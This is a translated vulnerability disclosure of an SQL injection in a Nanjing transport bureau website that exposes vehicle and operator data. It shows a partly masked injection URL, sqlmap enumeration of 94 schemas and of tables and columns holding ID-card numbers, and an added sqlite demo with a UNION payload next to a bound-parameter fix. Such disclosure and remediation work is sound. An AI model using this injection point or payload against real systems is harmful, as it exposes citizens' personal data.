
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0139047

Title: Information on every vehicle owner in the city (name, phone, vehicle model, ID-card number, etc.) can be obtained

Vendor: 南京交通运输局 (Nanjing Transportation Bureau)

Author: 逆流冰河

Submitted: 2015-09-07 11:29

Fixed: 2015-10-24 17:22

Disclosed: 2015-10-24 17:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-09-07: Details sent to the vendor; awaiting the vendor's handling
2015-09-09: CNCERT (National Internet Emergency Center) could not yet reach the responsible unit; details disclosed only to the reporting agency
2015-09-19: Details disclosed to core white hats and domain experts
2015-09-29: Details disclosed to regular white hats
2015-10-09: Details disclosed to intern white hats
2015-10-24: Details disclosed to the public

Summary:

The Nanjing Transportation Bureau leaks the personal information of all vehicle owners under its jurisdiction.

Details:

1. On http://**.**.**.**/, find "道路业户" (road transport operators) on the page, click through, and locate the injection point:
**.**.**.**:9016/AppPage/GLYW/gl_yh_look_dh.aspx?yh=&jy=&lb=%E5%85%A8%E9%80%89
(the lb parameter is the URL-encoded form of 全选, "select all")
2. 94 databases compromised (sqlmap output):
available databases [94]:
[*] 110
[*] BGT_MOA_TT
[*] BGT_MOAT
[*] BUILDING_DATA
[*] BUILDING_USER
[*] CIMS
[*] CONSOLE
[*] CTXSYS
[*] DATACENTER
[*] DBSNMP
[*] DFLZ
[*] DMSYS
[*] DZKC
[*] EP
[*] EPOINT_GGZY
[*] EPOINT_JCXT
[*] EPOINT_NJGGZY
[*] EPOINT_WEBAUDIT_NJ
[*] EXFSYS
[*] FLJG
[*] GTIG_NEWTECH_BX
[*] GTIG_NEWTECH_CENTER
[*] GTIG_NEWTECH_GC
[*] GTIG_NEWTECH_GCJD
[*] GTIG_NEWTECH_GL
[*] GTIG_NEWTECH_GX
[*] GTIG_NEWTECH_HGY
[*] GTIG_NEWTECH_JJKF
[*] GTIG_NEWTECH_JN
[*] GTIG_NEWTECH_JNKF
[*] GTIG_NEWTECH_JY
[*] GTIG_NEWTECH_LH
[*] GTIG_NEWTECH_LS
[*] GTIG_NEWTECH_NBXC
[*] GTIG_NEWTECH_PK
[*] GTIG_NEWTECH_PKXC
[*] GTIG_NEWTECH_QH
[*] GTIG_NEWTECH_QLKJCXY
[*] GTIG_NEWTECH_QX
[*] GTIG_NEWTECH_QXJD
[*] GTIG_NEWTECH_XG
[*] GTIG_NEWTECH_XW
[*] GTIG_NEWTECH_YCFW
[*] GTIG_NEWTECH_YH
[*] GZW
[*] IT
[*] JLL
[*] JTKJXM
[*] JTZFPT2
[*] JTZFRY
[*] LS_CGJ
[*] LS_JGJ
[*] MDSYS
[*] MOA2_USER
[*] MOC_MOA_USER
[*] MOC_ZYGL_USER
[*] NEWJSW
[*] NJGZW
[*] NJICCP
[*] NJICCPP
[*] NJRD
[*] NJZWFWRX2
[*] NJZYZ
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SAFETY
[*] SCOTT
[*] SMC
[*] SUNTIAN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] USER_MOA
[*] USER_OA
[*] USER_XTBG
[*] USR_SPORTS_QYH
[*] USR_SPORTS_XXFB
[*] USR_SPORTSGAMES_DQ_NJ
[*] USR_SPORTSGAMES_NANJING
[*] WMSYS
[*] WW_SJGXK
[*] WW_SJJHZX
[*] XDB
[*] XXBS
[*] XZZF
[*] ZFRY
[*] ZX_CGJ
[*] ZX_HBJ
[*] ZX_JGJ
[*] ZX_JTJ
[*] ZX_QXJ
3. Let's look at one database at random.
Database: NEWJSW
[175 tables]
+-------------------------------+
| BAK_JSW_DWDA_20130319 |
| BAK_JSW_DWDA_20130320 |
| BAK_JSW_DWDA_20130320_2 |
| BZ_JDB |
| BZ_JDB2 |
| BZ_JSBT_BTJGB |
| BZ_JSBT_BTJS |
| BZ_JSBT_DLGXB |
| BZ_JSBT_DWTZHB |
| BZ_JSBT_DWTZHB_NEW |
| BZ_JSBT_FFFSB |
| BZ_JSBT_JDB |
| BZ_JSBT_LSGXB |
| BZ_JSBT_QHDZB |
| BZ_JSBT_RYLBB |
| BZ_JSBT_SQB |
| BZ_JSBT_SQMCH |
| BZ_JSBT_TCQHB |
| BZ_JSBT_TXTZB |
| BZ_JSBT_XBB |
| BZ_JSBT_ZJLXB |
| BZ_JSW_BLZT |
| BZ_JSW_FAIL_REASON |
| BZ_JSW_RYLXB |
| BZ_QMB |
| BZ_SQB |
| BZ_SQB2 |
| FF |
| JSBT_DWDA |
| JSBT_DWDA_320100V3 |
| JSBT_TXDA |
| JSBT_TXDA2 |
| JSBT_TXDA_320100V3 |
| JSBT_TXDA_BC |
| JSW_DWDA |
| JSW_DWDA_20130402BAK |
| JSW_DWDA_20130403BAK |
| JSW_DWDA_20130428BAK |
| JSW_DWDA_20130617BAK |
| JSW_DWDA_20130703BAK |
| JSW_DWDA_20130901BAK |
| JSW_DWDA_20130903BAK |
| JSW_DWDA_20131009BAK |
| JSW_DWDA_20131231BAK |
| JSW_DWDA_201400701BAK |
| JSW_DWDA_201400801BAK |
| JSW_DWDA_201400911BAK |
| JSW_DWDA_20140107BAK |
| JSW_DWDA_20140220BAK |
| JSW_DWDA_20140307BAK |
| JSW_DWDA_20140320BAK |
| JSW_DWDA_20140403BAK |
| JSW_DWDA_20140505BAK |
| JSW_DWDA_20140603BAK |
| JSW_DWDA_201407DELINFO |
| JSW_DWDA_20140804BAK |
| JSW_DWDA_20141010BAK |
| JSW_DWDA_20141104BAK |
| JSW_DWDA_20141201BAK |
| JSW_DWDA_20150114BAK |
| JSW_DWDA_20150202BAK |
| JSW_DWDA_20150309BAK |
| JSW_DWDA_RECOVERY |
| JSW_DWSTATUS_LOG |
| JSW_FLOW_RYB |
| JSW_GSQKMXB |
| JSW_GSQKMXB20130301BAK |
| JSW_GSQKMXB_20130424BAK |
| JSW_GSQKMXB_20131013BAK |
| JSW_GSQKMXB_DELINFO |
| JSW_GSQKMXB_RECOVERY |
| JSW_HPQKMXB |
| JSW_HPQKMXB2 |
| JSW_HPQKMXB2B20130301BAK |
| JSW_HPQKMXB2_20131013BAK |
| JSW_HPQKMXB2_20140415BAK |
| JSW_HPQKMXB2_BAK_222 |
| JSW_HPQKMXB2_RECOVERY |
| JSW_HPQKMXB_DELINFO |
| JSW_HQ |
| JSW_HQ2 |
| JSW_JFRY |
| JSW_JFRY_RECOVERY |
| JSW_LESSFIVE_CONFIRM |
| JSW_LESSFIVE_CONFIRM_RECOVERY |
| JSW_SQJLB |
| JSW_SQJLB20130301BAK |
| JSW_SQJLB20130301_02BAK |
| JSW_SQJLB20140619 |
| JSW_SQJLB20140701 |
| JSW_SQJLB_20131013BAK |
| JSW_SQJLB_BAK20130514 |
| JSW_SQJLB_BAK20130531 |
| JSW_SQJLB_DELINFO |
| JSW_SQJLB_FAIL |
| JSW_SQJLB_RECOVERY |
| JSW_TXDA |
| JSW_TXDA_20130403BAK |
| JSW_TXDA_20130428BAK |
| JSW_TXDA_20130617BAK |
| JSW_TXDA_20130703BAK |
| JSW_TXDA_20130712BAK |
| JSW_TXDA_20130901BAK |
| JSW_TXDA_20131009BAK |
| JSW_TXDA_20131013BAK |
| JSW_TXDA_20131231BAK |
| JSW_TXDA_20140107BAK |
| JSW_TXDA_20140112BAK |
| JSW_TXDA_20140220BAK |
| JSW_TXDA_20140307BAK |
| JSW_TXDA_20140403BAK |
| JSW_TXDA_20140505BAK |
| JSW_TXDA_20140509 |
| JSW_TXDA_20140603BAK |
| JSW_TXDA_20140701BAK |
| JSW_TXDA_20140801BAK |
| JSW_TXDA_20140804BAK |
| JSW_TXDA_20140911BAK |
| JSW_TXDA_20141010BAK |
| JSW_TXDA_20141104BAK |
| JSW_TXDA_20141201BAK |
| JSW_TXDA_20141215 |
| JSW_TXDA_2014DELINFO |
| JSW_TXDA_20150114BAK |
| JSW_TXDA_20150202BAK |
| JSW_TXDA_20150309BAK |
| JSW_TXDA_BAK_20130301 |
| JSW_TXDA_DELINFO |
| JSW_TXDA_RECOVERY |
| JSW_ZFQKMXB |
| JSW_ZFQKMXB20130301BAK |
| JSW_ZFQKMXB_20131013BAK |
| JSW_ZFQKMXB_BAK20130614 |
| JSW_ZFQKMXB_BAK20130630 |
| JSW_ZFQKMXB_DELINFO |
| JSW_ZFQKMXB_JC |
| JSW_ZFQKMXB_JC20130301BAK |
| JSW_ZFQKMXB_RECOVERY |
| JSW_ZFQKMXB_TMPSFZ |
| OA_ACTMENU |
| OA_FJB |
| OA_FJCSB |
| OA_GQCSB |
| OA_JSXXB |
| OA_MANAGER_QX |
| OA_MAN_ROLES |
| OA_ROLES |
| OA_ROLES_QX |
| OA_STATUS |
| OA_THEME |
| OA_TYMENU |
| OA_TYMENU_BAK |
| OA_TZ_FJB |
| OA_TZ_SJKSB |
| OA_TZ_XXB |
| OA_XXB |
| OA_YCCSB |
| OA_YDCSB |
| TMP_JSBT_HASNOTINSERT |
| TMP_JSBT_LEFT_RY |
| TMP_JSW_DWDA68 |
| TMP_JSW_HPQKMXB |
| TMP_JSW_HPQKMXB20130301BAK |
| TMP_JSW_LESSFIVE_CONFIRM |
| TMP_JSW_SQJLB |
| TMP_JSW_STOS |
| TMP_JSW_ZFQKMXB |
| TMP_JSW_ZFQKMXB_BAK20131009 |
| TTMP_JSW_ZFQKMXB20130301BAK |
| V_USER |
| XX |
| YX_RYB |
| YX_RYB2 |
| YX_RYB2_BAK20130225 |
| ZZZ |
+-------------------------------+
4. Pick a table at random and look at its columns:
Database: NEWJSW
Table: YX_RYB
[12 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| CSNY | VARCHAR2 |
| DH | VARCHAR2 |
| JD | VARCHAR2 |
| KSM | VARCHAR2 |
| QH | VARCHAR2 |
| RYH | VARCHAR2 |
| SFZ | VARCHAR2 |
| THEME | VARCHAR2 |
| XB | VARCHAR2 |
| XM | VARCHAR2 |
| YX | VARCHAR2 |
| ZCSJ | VARCHAR2 |
+--------+----------+
5. There are ID-card numbers and the like in here; I won't post screenshots, since this is a government site and I'm being careful.

Proof of vulnerability:

As described in the title.

Fix recommendation:

This is a government department, after all, and every vehicle owner's information can be obtained at will...
Patch it.
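The report shows the symptom (sqlmap walking the schema list) and asks for a patch without saying what the patch is. The following is an added example, not code from the original report or from the bureau's site, that reproduces both sides in miniature: a lookup handler that pastes the request's yh / jy / lb parameters straight into SQL, the way gl_yh_look_dh.aspx?yh=&jy=&lb=全选 evidently does, next to the bound-parameter version that closes the hole. Assumptions: the real backend is Oracle (the dumped column types are VARCHAR2 and the schema list contains SYS, SYSTEM, CTXSYS, MDSYS and other Oracle built-ins; on Oracle, sqlmap's "available databases" are the schemas from ALL_USERS). sqlite3 stands in for it so the example runs offline, with sqlite_master playing the role of Oracle's ALL_TABLES. The table DLYH, its columns XM, DH, LB, and the sample rows are invented for illustration and do not come from the dump.

```python
"""Added example (not part of the original WooYun report or the site's code):
the injectable lookup pattern and its bound-parameter fix, with sqlite3
standing in for the Oracle backend so it runs offline."""
import sqlite3

# Constructed sample data: a small "road transport operator" (道路业户) table.
# The table and column names are invented, not taken from the dump.
SAMPLE_ROWS = [
    ("Operator A", "13800000001", "客运"),
    ("Operator B", "13800000002", "货运"),
]
ALLOWED_LB = {"全选", "客运", "货运"}   # "全选" means "select all"

# The shape of payload sqlmap's --tables step ends up sending once lb= is known
# to be injectable: close the string literal, UNION in a catalogue query,
# comment out the trailing quote. Against Oracle the subquery would read
# ALL_TABLES (OWNER, TABLE_NAME); against the stand-in it reads sqlite_master.
PAYLOAD = "x' UNION SELECT name, type FROM sqlite_master--"


def make_db() -> sqlite3.Connection:
    """Build the in-memory stand-in for the application's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE DLYH (XM TEXT, DH TEXT, LB TEXT)")
    conn.executemany("INSERT INTO DLYH VALUES (?, ?, ?)", SAMPLE_ROWS)
    # A second table unrelated to the lookup page, like YX_RYB in the report;
    # the injection reaches it anyway because it can read the catalogue.
    conn.execute("CREATE TABLE YX_RYB_DEMO (XM TEXT, SFZ TEXT)")
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, yh: str, jy: str, lb: str) -> list:
    """Vulnerable pattern: request parameters concatenated into the SQL text."""
    sql = ("SELECT XM, DH FROM DLYH WHERE XM LIKE '%" + yh + "%'"
           " AND DH LIKE '%" + jy + "%'")
    if lb != "全选":
        sql += " AND LB = '" + lb + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, yh: str, jy: str, lb: str) -> list:
    """Fixed pattern: the same query with every user value bound as a
    parameter, so a quote inside lb is just a character in a category name."""
    sql = "SELECT XM, DH FROM DLYH WHERE XM LIKE ? AND DH LIKE ?"
    params = ["%" + yh + "%", "%" + jy + "%"]
    if lb != "全选":
        sql += " AND LB = ?"
        params.append(lb)
    return conn.execute(sql, params).fetchall()


def lb_is_allowed(lb: str) -> bool:
    """Defence in depth: lb is a fixed category selector from a menu, so it can
    be allow-listed before the value ever reaches the query layer."""
    return lb in ALLOWED_LB


def demo() -> dict:
    """Run the payload through both handlers and return what each one yields."""
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "", "", "全选"),
        "leaked_tables": sorted(lookup_vulnerable(conn, "", "", PAYLOAD)),
        "safe": lookup_safe(conn, "", "", PAYLOAD),
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key}: {rows}")
```

With the concatenated query the payload returns the catalogue rows (every table name) instead of operator records, which is exactly the step the report labels "94 databases compromised"; with bound parameters the same payload is compared literally against LB and returns nothing. Two further points for whoever patches the real site: the other two parameters (yh, jy) are built into the query the same way and need the same treatment, and the fact that a public lookup page could list the tables of 90-odd other schemas means the application's database account should also be cut down to the one schema it needs.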

Copyright notice: please credit 逆流冰河@乌云 when reposting


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-09-09 17:20

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Jiangsu branch, which will coordinate remediation with the unit that administers the website.

Latest status:

None yet